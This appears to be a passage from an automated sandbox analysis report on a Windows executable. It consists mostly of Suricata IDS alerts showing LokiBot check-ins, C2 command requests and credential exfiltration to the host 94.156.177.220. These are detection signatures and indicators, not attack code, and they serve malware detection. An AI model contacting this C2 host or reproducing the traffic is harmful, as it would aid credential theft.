              2024-10-25T11:30:06.831907+020020216411A Network Trojan was detected192.168.2.186422794.156.177.22080TCP
              2024-10-25T11:30:07.961822+020020216411A Network Trojan was detected192.168.2.186422894.156.177.22080TCP
              2024-10-25T11:30:09.105260+020020216411A Network Trojan was detected192.168.2.186422994.156.177.22080TCP
              2024-10-25T11:30:10.731680+020020216411A Network Trojan was detected192.168.2.186423094.156.177.22080TCP
              2024-10-25T11:30:11.866553+020020216411A Network Trojan was detected192.168.2.186423194.156.177.22080TCP
              2024-10-25T11:30:12.989441+020020216411A Network Trojan was detected192.168.2.186423294.156.177.22080TCP
              2024-10-25T11:30:14.159631+020020216411A Network Trojan was detected192.168.2.186423394.156.177.22080TCP
              2024-10-25T11:30:15.291917+020020216411A Network Trojan was detected192.168.2.186423494.156.177.22080TCP
              2024-10-25T11:30:16.452907+020020216411A Network Trojan was detected192.168.2.186423594.156.177.22080TCP
              2024-10-25T11:30:17.572116+020020216411A Network Trojan was detected192.168.2.186423694.156.177.22080TCP
              2024-10-25T11:30:18.689593+020020216411A Network Trojan was detected192.168.2.186423794.156.177.22080TCP
              2024-10-25T11:30:19.821385+020020216411A Network Trojan was detected192.168.2.186423894.156.177.22080TCP
              2024-10-25T11:30:20.946553+020020216411A Network Trojan was detected192.168.2.186423994.156.177.22080TCP
              2024-10-25T11:30:22.069912+020020216411A Network Trojan was detected192.168.2.186424094.156.177.22080TCP
              2024-10-25T11:30:23.211887+020020216411A Network Trojan was detected192.168.2.186424194.156.177.22080TCP
              2024-10-25T11:30:24.373368+020020216411A Network Trojan was detected192.168.2.186424294.156.177.22080TCP
              2024-10-25T11:30:25.629029+020020216411A Network Trojan was detected192.168.2.186424394.156.177.22080TCP
              2024-10-25T11:30:26.738112+020020216411A Network Trojan was detected192.168.2.186424494.156.177.22080TCP
              2024-10-25T11:30:27.879604+020020216411A Network Trojan was detected192.168.2.186424594.156.177.22080TCP
              2024-10-25T11:30:29.462637+020020216411A Network Trojan was detected192.168.2.186424694.156.177.22080TCP
              2024-10-25T11:30:30.594455+020020216411A Network Trojan was detected192.168.2.186424794.156.177.22080TCP
              2024-10-25T11:30:31.721488+020020216411A Network Trojan was detected192.168.2.186424894.156.177.22080TCP
              2024-10-25T11:30:32.864200+020020216411A Network Trojan was detected192.168.2.186424994.156.177.22080TCP
              2024-10-25T11:30:34.018598+020020216411A Network Trojan was detected192.168.2.186425094.156.177.22080TCP
              2024-10-25T11:30:35.149886+020020216411A Network Trojan was detected192.168.2.186425194.156.177.22080TCP
              2024-10-25T11:30:36.273882+020020216411A Network Trojan was detected192.168.2.186425294.156.177.22080TCP
              2024-10-25T11:30:37.412674+020020216411A Network Trojan was detected192.168.2.186425394.156.177.22080TCP
              2024-10-25T11:30:38.567606+020020216411A Network Trojan was detected192.168.2.186425494.156.177.22080TCP
              2024-10-25T11:30:39.698213+020020216411A Network Trojan was detected192.168.2.186425594.156.177.22080TCP
              2024-10-25T11:30:40.821388+020020216411A Network Trojan was detected192.168.2.186425694.156.177.22080TCP
              2024-10-25T11:30:41.962121+020020216411A Network Trojan was detected192.168.2.186425794.156.177.22080TCP
              2024-10-25T11:30:43.125026+020020216411A Network Trojan was detected192.168.2.186425894.156.177.22080TCP
              2024-10-25T11:30:44.259225+020020216411A Network Trojan was detected192.168.2.186425994.156.177.22080TCP
              2024-10-25T11:30:45.411989+020020216411A Network Trojan was detected192.168.2.186426094.156.177.22080TCP
              2024-10-25T11:30:46.568424+020020216411A Network Trojan was detected192.168.2.186426194.156.177.22080TCP
              2024-10-25T11:30:47.708109+020020216411A Network Trojan was detected192.168.2.186426294.156.177.22080TCP
              2024-10-25T11:30:48.826402+020020216411A Network Trojan was detected192.168.2.186426394.156.177.22080TCP
              2024-10-25T11:30:49.990988+020020216411A Network Trojan was detected192.168.2.186426494.156.177.22080TCP
              2024-10-25T11:30:51.141273+020020216411A Network Trojan was detected192.168.2.186426594.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:48.526456+020028257661Malware Command and Control Activity Detected192.168.2.184969994.156.177.22080TCP
              2024-10-25T11:28:49.651298+020028257661Malware Command and Control Activity Detected192.168.2.184970094.156.177.22080TCP
              2024-10-25T11:28:50.712196+020028257661Malware Command and Control Activity Detected192.168.2.184970194.156.177.22080TCP
              2024-10-25T11:28:52.217576+020028257661Malware Command and Control Activity Detected192.168.2.184970394.156.177.22080TCP
              2024-10-25T11:28:53.615196+020028257661Malware Command and Control Activity Detected192.168.2.184970494.156.177.22080TCP
              2024-10-25T11:28:54.898490+020028257661Malware Command and Control Activity Detected192.168.2.184970594.156.177.22080TCP
              2024-10-25T11:28:56.017260+020028257661Malware Command and Control Activity Detected192.168.2.184970694.156.177.22080TCP
              2024-10-25T11:28:57.125135+020028257661Malware Command and Control Activity Detected192.168.2.184970794.156.177.22080TCP
              2024-10-25T11:28:58.258304+020028257661Malware Command and Control Activity Detected192.168.2.184970894.156.177.22080TCP
              2024-10-25T11:28:59.390884+020028257661Malware Command and Control Activity Detected192.168.2.184970994.156.177.22080TCP
              2024-10-25T11:29:00.530239+020028257661Malware Command and Control Activity Detected192.168.2.184971094.156.177.22080TCP
              2024-10-25T11:29:01.681309+020028257661Malware Command and Control Activity Detected192.168.2.186416794.156.177.22080TCP
              2024-10-25T11:29:02.822243+020028257661Malware Command and Control Activity Detected192.168.2.186416894.156.177.22080TCP
              2024-10-25T11:29:03.983922+020028257661Malware Command and Control Activity Detected192.168.2.186416994.156.177.22080TCP
              2024-10-25T11:29:05.122017+020028257661Malware Command and Control Activity Detected192.168.2.186417094.156.177.22080TCP
              2024-10-25T11:29:06.430963+020028257661Malware Command and Control Activity Detected192.168.2.186417194.156.177.22080TCP
              2024-10-25T11:29:07.550024+020028257661Malware Command and Control Activity Detected192.168.2.186417294.156.177.22080TCP
              2024-10-25T11:29:08.684720+020028257661Malware Command and Control Activity Detected192.168.2.186417394.156.177.22080TCP
              2024-10-25T11:29:09.814451+020028257661Malware Command and Control Activity Detected192.168.2.186417494.156.177.22080TCP
              2024-10-25T11:29:10.949279+020028257661Malware Command and Control Activity Detected192.168.2.186417594.156.177.22080TCP
              2024-10-25T11:29:12.081936+020028257661Malware Command and Control Activity Detected192.168.2.186417694.156.177.22080TCP
              2024-10-25T11:29:13.223654+020028257661Malware Command and Control Activity Detected192.168.2.186417794.156.177.22080TCP
              2024-10-25T11:29:14.340855+020028257661Malware Command and Control Activity Detected192.168.2.186417894.156.177.22080TCP
              2024-10-25T11:29:15.464654+020028257661Malware Command and Control Activity Detected192.168.2.186417994.156.177.22080TCP
              2024-10-25T11:29:16.633739+020028257661Malware Command and Control Activity Detected192.168.2.186418094.156.177.22080TCP
              2024-10-25T11:29:17.750103+020028257661Malware Command and Control Activity Detected192.168.2.186418194.156.177.22080TCP
              2024-10-25T11:29:18.913135+020028257661Malware Command and Control Activity Detected192.168.2.186418294.156.177.22080TCP
              2024-10-25T11:29:20.023984+020028257661Malware Command and Control Activity Detected192.168.2.186418394.156.177.22080TCP
              2024-10-25T11:29:21.158391+020028257661Malware Command and Control Activity Detected192.168.2.186418494.156.177.22080TCP
              2024-10-25T11:29:22.318196+020028257661Malware Command and Control Activity Detected192.168.2.186418594.156.177.22080TCP
              2024-10-25T11:29:23.422578+020028257661Malware Command and Control Activity Detected192.168.2.186418694.156.177.22080TCP
              2024-10-25T11:29:24.535211+020028257661Malware Command and Control Activity Detected192.168.2.186418794.156.177.22080TCP
              2024-10-25T11:29:25.670775+020028257661Malware Command and Control Activity Detected192.168.2.186418894.156.177.22080TCP
              2024-10-25T11:29:26.793846+020028257661Malware Command and Control Activity Detected192.168.2.186418994.156.177.22080TCP
              2024-10-25T11:29:27.935220+020028257661Malware Command and Control Activity Detected192.168.2.186419094.156.177.22080TCP
              2024-10-25T11:29:29.054472+020028257661Malware Command and Control Activity Detected192.168.2.186419194.156.177.22080TCP
              2024-10-25T11:29:30.177026+020028257661Malware Command and Control Activity Detected192.168.2.186419294.156.177.22080TCP
              2024-10-25T11:29:31.301159+020028257661Malware Command and Control Activity Detected192.168.2.186419394.156.177.22080TCP
              2024-10-25T11:29:32.403178+020028257661Malware Command and Control Activity Detected192.168.2.186419494.156.177.22080TCP
              2024-10-25T11:29:33.723057+020028257661Malware Command and Control Activity Detected192.168.2.186419594.156.177.22080TCP
              2024-10-25T11:29:34.874543+020028257661Malware Command and Control Activity Detected192.168.2.186419694.156.177.22080TCP
              2024-10-25T11:29:35.995240+020028257661Malware Command and Control Activity Detected192.168.2.186419794.156.177.22080TCP
              2024-10-25T11:29:37.269058+020028257661Malware Command and Control Activity Detected192.168.2.186419894.156.177.22080TCP
              2024-10-25T11:29:38.397005+020028257661Malware Command and Control Activity Detected192.168.2.186419994.156.177.22080TCP
              2024-10-25T11:29:39.536926+020028257661Malware Command and Control Activity Detected192.168.2.186420194.156.177.22080TCP
              2024-10-25T11:29:40.654260+020028257661Malware Command and Control Activity Detected192.168.2.186420294.156.177.22080TCP
              2024-10-25T11:29:41.790844+020028257661Malware Command and Control Activity Detected192.168.2.186420394.156.177.22080TCP
              2024-10-25T11:29:42.941323+020028257661Malware Command and Control Activity Detected192.168.2.186420494.156.177.22080TCP
              2024-10-25T11:29:44.078643+020028257661Malware Command and Control Activity Detected192.168.2.186420694.156.177.22080TCP
              2024-10-25T11:29:45.213270+020028257661Malware Command and Control Activity Detected192.168.2.186420894.156.177.22080TCP
              2024-10-25T11:29:46.330109+020028257661Malware Command and Control Activity Detected192.168.2.186420994.156.177.22080TCP
              2024-10-25T11:29:47.482694+020028257661Malware Command and Control Activity Detected192.168.2.186421094.156.177.22080TCP
              2024-10-25T11:29:48.605816+020028257661Malware Command and Control Activity Detected192.168.2.186421194.156.177.22080TCP
              2024-10-25T11:29:49.798794+020028257661Malware Command and Control Activity Detected192.168.2.186421294.156.177.22080TCP
              2024-10-25T11:29:50.934440+020028257661Malware Command and Control Activity Detected192.168.2.186421394.156.177.22080TCP
              2024-10-25T11:29:52.064655+020028257661Malware Command and Control Activity Detected192.168.2.186421494.156.177.22080TCP
              2024-10-25T11:29:53.204009+020028257661Malware Command and Control Activity Detected192.168.2.186421594.156.177.22080TCP
              2024-10-25T11:29:54.349067+020028257661Malware Command and Control Activity Detected192.168.2.186421694.156.177.22080TCP
              2024-10-25T11:29:55.463755+020028257661Malware Command and Control Activity Detected192.168.2.186421794.156.177.22080TCP
              2024-10-25T11:29:56.583523+020028257661Malware Command and Control Activity Detected192.168.2.186421894.156.177.22080TCP
              2024-10-25T11:29:57.714329+020028257661Malware Command and Control Activity Detected192.168.2.186421994.156.177.22080TCP
              2024-10-25T11:29:58.866731+020028257661Malware Command and Control Activity Detected192.168.2.186422094.156.177.22080TCP
              2024-10-25T11:29:59.980749+020028257661Malware Command and Control Activity Detected192.168.2.186422194.156.177.22080TCP
              2024-10-25T11:30:01.127492+020028257661Malware Command and Control Activity Detected192.168.2.186422294.156.177.22080TCP
              2024-10-25T11:30:02.258244+020028257661Malware Command and Control Activity Detected192.168.2.186422394.156.177.22080TCP
              2024-10-25T11:30:03.396659+020028257661Malware Command and Control Activity Detected192.168.2.186422494.156.177.22080TCP
              2024-10-25T11:30:04.577592+020028257661Malware Command and Control Activity Detected192.168.2.186422594.156.177.22080TCP
              2024-10-25T11:30:05.709458+020028257661Malware Command and Control Activity Detected192.168.2.186422694.156.177.22080TCP
              2024-10-25T11:30:06.831907+020028257661Malware Command and Control Activity Detected192.168.2.186422794.156.177.22080TCP
              2024-10-25T11:30:07.961822+020028257661Malware Command and Control Activity Detected192.168.2.186422894.156.177.22080TCP
              2024-10-25T11:30:09.105260+020028257661Malware Command and Control Activity Detected192.168.2.186422994.156.177.22080TCP
              2024-10-25T11:30:10.731680+020028257661Malware Command and Control Activity Detected192.168.2.186423094.156.177.22080TCP
              2024-10-25T11:30:11.866553+020028257661Malware Command and Control Activity Detected192.168.2.186423194.156.177.22080TCP
              2024-10-25T11:30:12.989441+020028257661Malware Command and Control Activity Detected192.168.2.186423294.156.177.22080TCP
              2024-10-25T11:30:14.159631+020028257661Malware Command and Control Activity Detected192.168.2.186423394.156.177.22080TCP
              2024-10-25T11:30:15.291917+020028257661Malware Command and Control Activity Detected192.168.2.186423494.156.177.22080TCP
              2024-10-25T11:30:16.452907+020028257661Malware Command and Control Activity Detected192.168.2.186423594.156.177.22080TCP
              2024-10-25T11:30:17.572116+020028257661Malware Command and Control Activity Detected192.168.2.186423694.156.177.22080TCP
              2024-10-25T11:30:18.689593+020028257661Malware Command and Control Activity Detected192.168.2.186423794.156.177.22080TCP
              2024-10-25T11:30:19.821385+020028257661Malware Command and Control Activity Detected192.168.2.186423894.156.177.22080TCP
              2024-10-25T11:30:20.946553+020028257661Malware Command and Control Activity Detected192.168.2.186423994.156.177.22080TCP
              2024-10-25T11:30:22.069912+020028257661Malware Command and Control Activity Detected192.168.2.186424094.156.177.22080TCP
              2024-10-25T11:30:23.211887+020028257661Malware Command and Control Activity Detected192.168.2.186424194.156.177.22080TCP
              2024-10-25T11:30:24.373368+020028257661Malware Command and Control Activity Detected192.168.2.186424294.156.177.22080TCP
              2024-10-25T11:30:25.629029+020028257661Malware Command and Control Activity Detected192.168.2.186424394.156.177.22080TCP
              2024-10-25T11:30:26.738112+020028257661Malware Command and Control Activity Detected192.168.2.186424494.156.177.22080TCP
              2024-10-25T11:30:27.879604+020028257661Malware Command and Control Activity Detected192.168.2.186424594.156.177.22080TCP
              2024-10-25T11:30:29.462637+020028257661Malware Command and Control Activity Detected192.168.2.186424694.156.177.22080TCP
              2024-10-25T11:30:30.594455+020028257661Malware Command and Control Activity Detected192.168.2.186424794.156.177.22080TCP
              2024-10-25T11:30:31.721488+020028257661Malware Command and Control Activity Detected192.168.2.186424894.156.177.22080TCP
              2024-10-25T11:30:32.864200+020028257661Malware Command and Control Activity Detected192.168.2.186424994.156.177.22080TCP
              2024-10-25T11:30:34.018598+020028257661Malware Command and Control Activity Detected192.168.2.186425094.156.177.22080TCP
              2024-10-25T11:30:35.149886+020028257661Malware Command and Control Activity Detected192.168.2.186425194.156.177.22080TCP
              2024-10-25T11:30:36.273882+020028257661Malware Command and Control Activity Detected192.168.2.186425294.156.177.22080TCP
              2024-10-25T11:30:37.412674+020028257661Malware Command and Control Activity Detected192.168.2.186425394.156.177.22080TCP
              2024-10-25T11:30:38.567606+020028257661Malware Command and Control Activity Detected192.168.2.186425494.156.177.22080TCP
              2024-10-25T11:30:39.698213+020028257661Malware Command and Control Activity Detected192.168.2.186425594.156.177.22080TCP
              2024-10-25T11:30:40.821388+020028257661Malware Command and Control Activity Detected192.168.2.186425694.156.177.22080TCP
              2024-10-25T11:30:41.962121+020028257661Malware Command and Control Activity Detected192.168.2.186425794.156.177.22080TCP
              2024-10-25T11:30:43.125026+020028257661Malware Command and Control Activity Detected192.168.2.186425894.156.177.22080TCP
              2024-10-25T11:30:44.259225+020028257661Malware Command and Control Activity Detected192.168.2.186425994.156.177.22080TCP
              2024-10-25T11:30:45.411989+020028257661Malware Command and Control Activity Detected192.168.2.186426094.156.177.22080TCP
              2024-10-25T11:30:46.568424+020028257661Malware Command and Control Activity Detected192.168.2.186426194.156.177.22080TCP
              2024-10-25T11:30:47.708109+020028257661Malware Command and Control Activity Detected192.168.2.186426294.156.177.22080TCP
              2024-10-25T11:30:48.826402+020028257661Malware Command and Control Activity Detected192.168.2.186426394.156.177.22080TCP
              2024-10-25T11:30:49.990988+020028257661Malware Command and Control Activity Detected192.168.2.186426494.156.177.22080TCP
              2024-10-25T11:30:51.141273+020028257661Malware Command and Control Activity Detected192.168.2.186426594.156.177.22080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: dw7h7aQwVZ.exeReversingLabs: Detection: 97%
              Source: dw7h7aQwVZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49708 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64235 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49708 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49708 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64254 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64254 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64254 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49705 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49705 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49705 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64231 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64231 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64231 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64235 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64193
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49710 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49710 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49710 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49706 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49707 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49699 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49707 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49707 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49699 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64167 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64167 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64167 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49705 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49705 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64216 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64223 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64216 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49699 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49706 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64176 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64174 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64174 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64174 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49707 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49705
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49707 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49701 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49701 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49701 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64222 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49707
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49706 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64223 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:49703 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:49703 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64223 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:49703 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.18:49699 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64216 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49708 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64235 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49708 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64216 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64254 -> 94.156.177.220:80
